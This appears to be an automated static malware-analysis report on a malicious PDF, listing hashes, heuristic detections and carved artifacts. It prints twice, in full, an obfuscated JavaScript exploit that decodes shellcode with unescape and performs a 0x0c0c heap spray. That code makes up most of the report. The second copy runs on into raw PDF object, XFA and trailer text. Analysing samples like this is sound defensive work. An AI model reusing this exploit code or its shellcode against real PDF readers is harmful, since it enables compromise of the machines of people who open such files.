Malicious PDF — malware analysis report

Static analysis result for SHA-256 46c93cd6a08bcd2f…

MALICIOUS

PDF

53.5 KB First seen: 2026-05-10
MD5: 2cdbb3fde20890e6c87111d6142c820d SHA-1: b67a1179e924a90d1843dc2df056775dafd04a56 SHA-256: 46c93cd6a08bcd2f370c7e6328c9601de9db912ff04355c62bb300f1f67770e0
76 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 3775 bytes
SHA-256: 125fd46dc455745d36ea31d3208f551c55a5c5c705575d6176ed97f250cfa571
Detection
ClamAV: No threats found
Obfuscation or payload: likely
8 of 12 identifiers look randomly generated (e.g. 'ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsS') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh = unescape;
var ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsSsrffjzYRMPuuVmXACJsVtyvTtzOLDjYWfAzEiGZUhHsWIGDDgJyjFfHRUYN = PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ub9bb%u2167%u2960%ub1c9%udd49%ud9c7%u2474%u5af4%u5a31%u0310%u105a%uea83%u5bfc%udd92%u1288%u1e5d%u4449%ufbd7%u5678%u8883%u6629%uddc7%u0dc1%uf585%u6352%uf902%uc9d3%u3474%ufce3%u9ab8%u9f27%ue144%u7f7b%u2a74%u7e8e%u57b1%ud261%u136a%uc2d0%u611f%ue3e9%uedcf%u9b51%u316a%u1125%u6274%u2e96%u9a3e%u689c%u9b9f%u6b71%ud2e3%u5ffe%ue497%uaed6%ud758%u7c16%ud767%u7d9a%ud0af%u0844%u22db%u0af8%u5818%u9f26%ufabd%u07ad%ufa66%ud162%uf0ed%u96cf%u14aa%u7bd1%u21c1%u7a5a%ua006%u5818%ue882%uc1fb%u5493%ufead%u31c4%u5a12%ud08e%udc47%ubccd%ud2a4%u3ced%u65a3%u0e9d%udd6c%u2309%ufbe5%u44ce%ubbdc%ubb41%ubbdf%u7848%ueb8b%ua9e2%u60b4%u56f3%u2661%uf8a3%u86da%ub913%u6e8a%u367e%u8ef4%u9c81%u249d%u777b%u1062%uaf83%u620a%ube84%ueb96%uaa62%ubd36%u433d%ue4ae%uf2b6%u332f%u35b3%ub7bb%ufb43%ub24c%u6c57%u89bd%u3b0a%u24c2%uc420%uc256%u93e3%uc8ce%ud4d2%u3350%u6f31%ua158%u18fa%u25a5%ud8fb%u2ff3%ub0fb%u0ba3%ua5a8%u86ab%u75dc%u283e%u2ab5%u40e9%u143b%ucfdd%u73c4%u2cdf%uba13%u4465%uae11%u41a5' );
var ElkWZyAgSePGJfFoDYZktOlCHNWlfcO = PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (ElkWZyAgSePGJfFoDYZktOlCHNWlfcO.length + 20 + 8 < 65536) ElkWZyAgSePGJfFoDYZktOlCHNWlfcO+=ElkWZyAgSePGJfFoDYZktOlCHNWlfcO;
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv = ElkWZyAgSePGJfFoDYZktOlCHNWlfcO.substring(0, (0x0c0c-0x24)/2);
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv += ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsSsrffjzYRMPuuVmXACJsVtyvTtzOLDjYWfAzEiGZUhHsWIGDDgJyjFfHRUYN;
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv += ElkWZyAgSePGJfFoDYZktOlCHNWlfcO;
vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo = dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv.substring(0, 65536/2);
while(vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo.length < 0x80000) vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo += vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo;
byLKrGtSKdLIXwadmSRwpkqczUPthpsXF = vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo.substring(0, 0x80000 - (0x1020-0x08) / 2);
var DGmGllWsCirTBxVCtzPMfSUgBWZQxWxHOXcSpbDdsWbBrzKSQSBumLBwSuIlMxncJLiHdygtirVLqpdDd = new Array();
for (fpRiyzWVlELbZf=0;fpRiyzWVlELbZf<0x1f0;fpRiyzWVlELbZf++) DGmGllWsCirTBxVCtzPMfSUgBWZQxWxHOXcSpbDdsWbBrzKSQSBumLBwSuIlMxncJLiHdygtirVLqpdDd[fpRiyzWVlELbZf]=byLKrGtSKdLIXwadmSRwpkqczUPthpsXF+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4661 bytes
SHA-256: 891ecd14f28a001b733400ffed76755eaabbd75f63068ed42a9a0be10ada5f86
Preview script
First 1,000 lines of the extracted script
var PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh = unescape;
var ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsSsrffjzYRMPuuVmXACJsVtyvTtzOLDjYWfAzEiGZUhHsWIGDDgJyjFfHRUYN = PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%ub9bb%u2167%u2960%ub1c9%udd49%ud9c7%u2474%u5af4%u5a31%u0310%u105a%uea83%u5bfc%udd92%u1288%u1e5d%u4449%ufbd7%u5678%u8883%u6629%uddc7%u0dc1%uf585%u6352%uf902%uc9d3%u3474%ufce3%u9ab8%u9f27%ue144%u7f7b%u2a74%u7e8e%u57b1%ud261%u136a%uc2d0%u611f%ue3e9%uedcf%u9b51%u316a%u1125%u6274%u2e96%u9a3e%u689c%u9b9f%u6b71%ud2e3%u5ffe%ue497%uaed6%ud758%u7c16%ud767%u7d9a%ud0af%u0844%u22db%u0af8%u5818%u9f26%ufabd%u07ad%ufa66%ud162%uf0ed%u96cf%u14aa%u7bd1%u21c1%u7a5a%ua006%u5818%ue882%uc1fb%u5493%ufead%u31c4%u5a12%ud08e%udc47%ubccd%ud2a4%u3ced%u65a3%u0e9d%udd6c%u2309%ufbe5%u44ce%ubbdc%ubb41%ubbdf%u7848%ueb8b%ua9e2%u60b4%u56f3%u2661%uf8a3%u86da%ub913%u6e8a%u367e%u8ef4%u9c81%u249d%u777b%u1062%uaf83%u620a%ube84%ueb96%uaa62%ubd36%u433d%ue4ae%uf2b6%u332f%u35b3%ub7bb%ufb43%ub24c%u6c57%u89bd%u3b0a%u24c2%uc420%uc256%u93e3%uc8ce%ud4d2%u3350%u6f31%ua158%u18fa%u25a5%ud8fb%u2ff3%ub0fb%u0ba3%ua5a8%u86ab%u75dc%u283e%u2ab5%u40e9%u143b%ucfdd%u73c4%u2cdf%uba13%u4465%uae11%u41a5' );
var ElkWZyAgSePGJfFoDYZktOlCHNWlfcO = PGaIjhRNEyWVyXxdwMLycgfkDHIVRCrSLLMybITZjHMzqtDwxvQNbbuzctwLKRbWHWGjzLYGxtoealh( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (ElkWZyAgSePGJfFoDYZktOlCHNWlfcO.length + 20 + 8 < 65536) ElkWZyAgSePGJfFoDYZktOlCHNWlfcO+=ElkWZyAgSePGJfFoDYZktOlCHNWlfcO;
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv = ElkWZyAgSePGJfFoDYZktOlCHNWlfcO.substring(0, (0x0c0c-0x24)/2);
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv += ThqOLhssJtnlHTRxOefbAThfdoOkbsEKDJDTwBsSsrffjzYRMPuuVmXACJsVtyvTtzOLDjYWfAzEiGZUhHsWIGDDgJyjFfHRUYN;
dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv += ElkWZyAgSePGJfFoDYZktOlCHNWlfcO;
vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo = dmbiHCYemdzdffzcSvqNDvODHIjvmswASFxZaHJkhthkxPJDRHsDXXUbMKMetv.substring(0, 65536/2);
while(vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo.length < 0x80000) vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo += vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo;
byLKrGtSKdLIXwadmSRwpkqczUPthpsXF = vrjwHTaEmnyJGFcUoOLBTzmCcoFsMirhBoWoQxBngLIDCTVLUYCCOXSwDKWaqOMuo.substring(0, 0x80000 - (0x1020-0x08) / 2);
var DGmGllWsCirTBxVCtzPMfSUgBWZQxWxHOXcSpbDdsWbBrzKSQSBumLBwSuIlMxncJLiHdygtirVLqpdDd = new Array();
for (fpRiyzWVlELbZf=0;fpRiyzWVlELbZf<0x1f0;fpRiyzWVlELbZf++) DGmGllWsCirTBxVCtzPMfSUgBWZQxWxHOXcSpbDdsWbBrzKSQSBumLBwSuIlMxncJLiHdygtirVLqpdDd[fpRiyzWVlELbZf]=byLKrGtSKdLIXwadmSRwpkqczUPthpsXF+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000053941 00000 n
0000053974 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54460
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: a4247bee57dbf5d9dd308adc5f48554bce94ed5d748933604a7aeb694e8a08e3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C

Open this report in the interactive analyzer, or submit your own file for analysis.